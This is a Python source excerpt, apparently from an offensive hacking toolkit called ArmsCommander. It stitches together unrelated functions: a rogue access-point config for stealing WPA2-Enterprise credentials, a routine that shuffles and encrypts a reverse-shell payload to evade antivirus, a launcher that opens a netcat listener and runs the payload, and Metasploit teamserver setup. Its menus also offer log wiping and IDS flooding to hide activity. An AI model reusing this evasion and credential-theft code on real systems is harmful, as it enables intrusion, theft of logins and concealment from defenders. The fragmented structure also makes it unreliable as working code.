def write_hostapd_conf():
os.chdir("/root/ArmsCommander/logs/MGT_ENT_cracker/")
essid_str = str(
raw_input(
toolkits.yellow(
"Enter the ESSID ('name') you want the AP to be called: ")))
bssid_str = str(
raw_input(
toolkits.yellow(
"Enter the BSSID MAC address you want to be called: ")))
channel_str = str(
raw_input(toolkits.yellow("Enter what channel you want to use on: ")))
w = open("hostapd.conf", "w")
hostapd_conf_contents = """
interface=wlan0
driver=nl80211
ssid={0}
bssid={1}
logger_stdout_level=0
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=2
wpa_key_mgmt=WPA-EAP
channel={2}
wpa_pairwise=TKIP CCMP""".format(str(essid_str), str(bssid_str),
str(channel_str))
w.write(hostapd_conf_contents)
w.close()
print toolkits.green("Your new hostapd conf file is completed")
return
def commandSegmentationTech(readLines):
shuffledPayload = {}
ctr = 0
for l in readLines:
arrayMap = []
brokenLine = l
brokenLine = re.findall('..?',brokenLine)
print "DEBUG: Malicious command broken apart before shuffling\r\n{}".format(brokenLine)
# Generates a shuffled version of the line
shuffledLine = random.sample(brokenLine,len(brokenLine))
print "DEBUG: Shuffled line to evade antivirus\r\n{}".format(shuffledLine)
# build a array map to reconstitute that line
for lElement in brokenLine:
query = lElement
index = findIndexValue(query,shuffledLine)
# ArrayMap = a map of indices to reconstruct the payload
arrayMap.append(index)
# Add dictionary entry where shuffledPayload = {[shuffledLine]:[arrayMap]}
# arrayMap = shuffledPayload[shuffledLine]
# shuffledPayload = arrayMap
shuffledPayload[ctr] = shuffledLine,arrayMap
print "DEBUG: Array-Map to reconstitute the payload\r\n{}".format(str(arrayMap))
ctr += 1
print green("DEBUG: ShuffledPayload with ArrayMaps for reconstitution:\r\n{}".format(shuffledPayload))
return shuffledPayload
def reconstituteLine(shuffledLine,arrayMap):
cmd=""
print red("DEBUG: Shuffled Line to Reconstitute\r\n{}".format(shuffledLine))
print yellow("DEBUG: arrayMap to reconstitute the payload\r\n{}".format(arrayMap))
for indice in arrayMap:
cmd = "{}{}".format(str(cmd),str(shuffledLine[indice]))
print green("DEBUG: Reconstituted Command:\r\n{}".format(str(cmd)))
return cmd
def pexpect_thread(cmd):
encoding = 'utf-8'
time = timer_thread()
# #timesup = False
thread = pexpect.spawn(cmd, timeout=300)
# fout = 'airodump.log'
# thread.logfile = fout
# #thread.logfile_read = sys.stdout
# thread.write()
dogass = 'f**k you pexpect module'
dogass = dogass.decode('utf-8')
outcomes = thread.expect([pexpect.TIMEOUT, pexpect.EOF, dogass])
# time.sleep(5)
# outcomes = pexpect.TIMEOUT
if (outcomes == 0): # out of time
print green("pexpect.TIMEOUT condition reached")
results = thread.read()
thread.terminate()
w = open('./airodump.log')
w.write(results)
w.close()
# logfile = thread.logfile
elif (outcomes == 1
): # end of file error, just send another line to throw it into loop
print yellow("pexpect.EOF conditioning reached")
thread.sendline('\n')
# elif(outcomes==2):
# results = thread.read()
# thread.terminate()
# w = open('./airodump.log')
# w.write(results)
# w.close()
elif (outcomes == 2):
print green("Woo, the variable is dog-ass")
print yellow("Thank you so much for wasting my time.")
results = thread.read()
thread.terminate()
w = open('./airodump.log', 'a+')
w.write(results)
w.close()
else:
exception = thread.read()
exception = str(exception.encode('utf-8')).strip().rstrip()
print exception
x = open('./exceptions_threading.log', 'a+')
x.write(exception)
x.close()
return results, outcomes, exceptions
def five_wireless_attacks(
): # In the age of Cyberterrorism. Only the most cunning will survive.
Menu_Header = colored('WIRELESS ATTACKS', 'cyan', attrs=['bold'])
print Menu_Header
opt_List = [
'\n\t#0. Return to Main Menu',
'#1. Cylon-Raider, automate wireless "Replay-Attacks" from the Aircrack-ng Suite',
'#2. Cylon Heavy-Raider, automate the WPS PIN brute-forcing vulnerability with Reaver',
'#3. Router-Sploit, Post-Exploitation hacking of APs that you cracked the passwords of',
'#4. ARP Injection Test, seeing if your external wireless card is working properly',
'#5. Hidden Network Decloaker, uncover hidden wireless APs',
'#6. ***NEW*** DRADIUS WPA2-MGT/ENT (name tentative to change), impersonate Enterprise/Management/PEAP encrypted WPA2 Access Points, steal credentials!'
]
print("\n\t".join(opt_List))
print toolkits.green('\t' + opt_List[6])
opt_Choice = str(raw_input("Enter a OPTION: "))
if opt_Choice == "0":
os.system('clear')
main()
elif opt_Choice == "1":
os.system('clear')
cylon_raider()
# MT_host_recon()
elif opt_Choice == "2":
os.system('clear')
heavy_raider()
# CornHarvester()
elif opt_Choice == "3":
os.system('clear')
router_sploit()
# NMap_Auto()
elif opt_Choice == "4":
os.system('clear')
ARP_injection_test()
# NMap_Custom()
elif opt_Choice == "5":
os.system('clear')
hidden_network_decloaker()
# SQLMap()
elif opt_Choice == "6":
os.system('clear')
mgt_ent_attacker()
five_wireless_attacks()
else:
print colored('You have entered a invalid option', 'red')
five_wireless_attacks()
def readSuspectedDomains(
suspectedDomains='/home/ctlister/Documents/Contract-VirusTotal/real_malware_domains.txt'
):
r = open(suspectedDomains, 'r')
l = r.readlines()
randomlypicked = random.sample(l, 4)
for line in l:
host = line.strip().rstrip()
print toolkits.green("Targeting {}".format(str(host)))
# print red("Debug: Running investigation on host\r\n{}".format(str(host)))
testFunction(host)
# results = queryUrl(key,host)
# print yellow(results)
# writeResults(results,host)
return
def launch_teamserver(login_parameters):
os.chdir('/usr/share/armitage')
public_ip = login_parameters[0]
teamserver_password = login_parameters[1]
print toolkits.green('PRE-FLIGHT: BEGINNING PRE-FLIGHT CHECKS')
print toolkits.yellow('PRE-FLIGHT: Starting up PostgreSQL server')
os.system('service postgresql start')
print toolkits.yellow('PRE-FLIGHT: Starting up Metasploit Service')
os.system('service metasploit start')
print toolkits.yellow('PRE-FLIGHT: Initializing Metasploit Database')
os.system('msfdb init')
print toolkits.green('LAUNCHING: Starting Metasploit Database')
os.system('msfdb start')
print toolkits.yellow(
'LAUNCHING: Killing all RUBY processes to shut down existing PIDs of msfrpc daemon'
)
os.system('killall ruby')
print toolkits.yellow(
'LAUNCHING: Killing any processes occupying PORT 55553')
os.system('fuser -k 55553/tcp')
print toolkits.green('Starting up Teamserver!')
cmd_str = """teamserver {0} {1}""".format(str(public_ip),
str(teamserver_password))
os.system(cmd_str)
return
def main():
decryptKey = generateKey()
decryptIV = generateIV()
code = read_template()
template_reverse_shell
payloadNoEncrypt = template_reverse_shell.splitlines()
shuffledPayload = commandSegmentationTech(payloadNoEncrypt)
# writableLines = convertIntoLines(shuffledPayload)
l_encrypted = cryptor(shuffledPayload, decryptKey, decryptIV)
outfile = writeUniquePayload(code, l_encrypted, decryptKey, decryptIV)
print red("DEBUG: Shuffled payload\r\n{}".format(str(shuffledPayload)))
out = b64encode(l_encrypted)
print yellow("DEBUG: Encrypted payload\r\n{}".format(str(out)))
print green("DEBUG: Payload generated at\r\n{}".format(str(outfile)))
rp = open(outfile, 'rb+')
uniquePayload = rp.read()
print red("DEBUG: Contents of {}\r\n".format(str(outfile)))
print yellow(uniquePayload)
print cyan("Opening netcat session")
os.system("""gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format(
str(LPORT)))
print green("You may run the payload with\r\npython {}".format(
str(outfile)))
time.sleep(2)
print green("Executing payload")
os.system("python {}".format(str(outfile)))
return
def three_remote_exploits_redesigned(): # Tentative project to reduce bloat
Menu_Header = colored('REMOTE EXPLOITATION', 'cyan', attrs=['bold'])
print Menu_Header
opt_List = [
'\n\t#0. Return to Main Menu',
'#1. PAYLOAD GENERATORS & LISTENERS, Metasploit Msfvenom, and open source alternatives RATs like Pupy and Stitch',
'#2. TOOLKITS, Social Engineers Toolkit',
'#3. OTHER, Does not fit in any other category, USB Rubber Ducky Encoders, stuff like Virus-Total Safe-Checker',
'#4. ***NEW***: FOREPLAY PROJECT, Easy-Mode Hacker Collaboration, gang up on single targets, easily generate Armitage Teamservers!'
]
print("\n\t".join(opt_List))
print toolkits.green('\t' + opt_List[4])
opt_Choice = str(raw_input("Enter a OPTION: "))
if opt_Choice == "0":
os.system('clear')
main()
elif opt_Choice == "1":
os.system('clear')
payload_generators_listeners()
three_remote_exploits_redesigned()
elif opt_Choice == "2":
os.system('clear')
remote_exploit_toolkits()
three_remote_exploits_redesigned()
elif opt_Choice == "3":
os.system('clear')
remote_exploits_other()
three_remote_exploits_redesigned()
elif opt_Choice == "4":
os.system('clear')
foreplay()
three_remote_exploits_redesigned()
else:
print colored('You have entered a invalid option', 'red')
three_remote_exploits_redesigned()
return
def two_net_defense_traffic_monitor():
Menu_Header = colored('NETWORK DEFENSE', 'cyan', attrs=['bold'])
print Menu_Header
opt_List = [
'\n\t#0 Return to Main Menu',
'#1. Tor + Proxychains, conceal your outbound traffic',
'#2. Network Monitoring Tools, p0f, Snort, and view active network connections',
'#3. Cover your tracks, clear your bash history and wipe your thumbnails cache',
'#4. TCP Kill a connection by host, IP, or port',
'#5. NGrep or "Network Grep", investigate a suspicious connection',
'#6. MacChanger, change your network card MAC address temporarily',
'#7. Fuser, identify and kill processes within a port range',
'#8. IDS Flooder, overwhelm a Intrusion Detection System with false-flag DDoS attacks to draw attention away from your actual activity',
'#9. FAIL-2-BAN, automatic banning daemon for SSH. Absolutely essential for remote AWS servers that are subjected to constant SSH brute-force attacks',
'#10. VIEW AUTH LOG, view your authentication log and make a backup of it.',
'#11. ***NEW***, JKD: Bluce-Ree Edition, auto-counterattack aggressive NMAP scans using a Metasploit Server Design Flaw'
]
print("\n\t".join(opt_List))
print toolkits.green('\t' + opt_List[11])
opt_Choice = str(raw_input("Enter a OPTION: "))
if opt_Choice == "0":
os.system('clear')
main()
elif opt_Choice == "1":
os.system('clear')
print colored('[+] Starting Tor + Proxychains',
'green',
attrs=['bold'])
tor_and_proxychains()
# MT_host_recon()
elif opt_Choice == "2":
os.system('clear')
print colored('[+] Starting Monitoring Tools', 'green', attrs=['bold'])
network_monitor_tools()
# CornHarvester()
elif opt_Choice == "3":
os.system('clear')
print colored('[+] Starting Cover Your Tracks',
'green',
attrs=['bold'])
cover_tracks()
# NMap_Auto()
elif opt_Choice == "4":
os.system('clear')
print colored('[+] Starting TCP Kill', 'green', attrs=['bold'])
TCPKill()
# NMap_Custom()
elif opt_Choice == "5":
os.system('clear')
print colored('[+] Starting Network Grep', 'green', attrs=['bold'])
NGrep()
# SQLMap()
elif opt_Choice == "6":
os.system('clear')
print colored('[+] Starting Mac Changer Interactive Menu',
'green',
attrs=['bold'])
macchanger()
# OWASP_zaproxy()
elif opt_Choice == "7":
os.system('clear')
print colored('[+] Starting Fuser', 'green', attrs=['bold'])
fuser()
# burpsuite()
elif opt_Choice == "8":
os.system('clear')
print colored('[+] Starting IDS Flooder Module',
'green',
attrs=['bold'])
IDS_Flooder()
elif opt_Choice == "9":
os.system('clear')
print colored('[+] Starting fail2ban Module', 'green', attrs=['bold'])
fail2ban()
elif opt_Choice == "10":
os.system('clear')
print colored('[+] Copying backup of auth.log to /root/Documents',
'yellow',
attrs=['bold'])
os.system('cp -r /var/log/auth.log /root/Documents')
os.system('cat /var/log/auth.log')
main()
elif opt_Choice == "11":
jkd_poc()
two_net_defense_traffic_monitor()
return
else:
print colored('You have entered a invalid option', 'red')
two_net_defense_traffic_monitor()
return
def green(string):
string = toolkits.green(string)
print string
return string
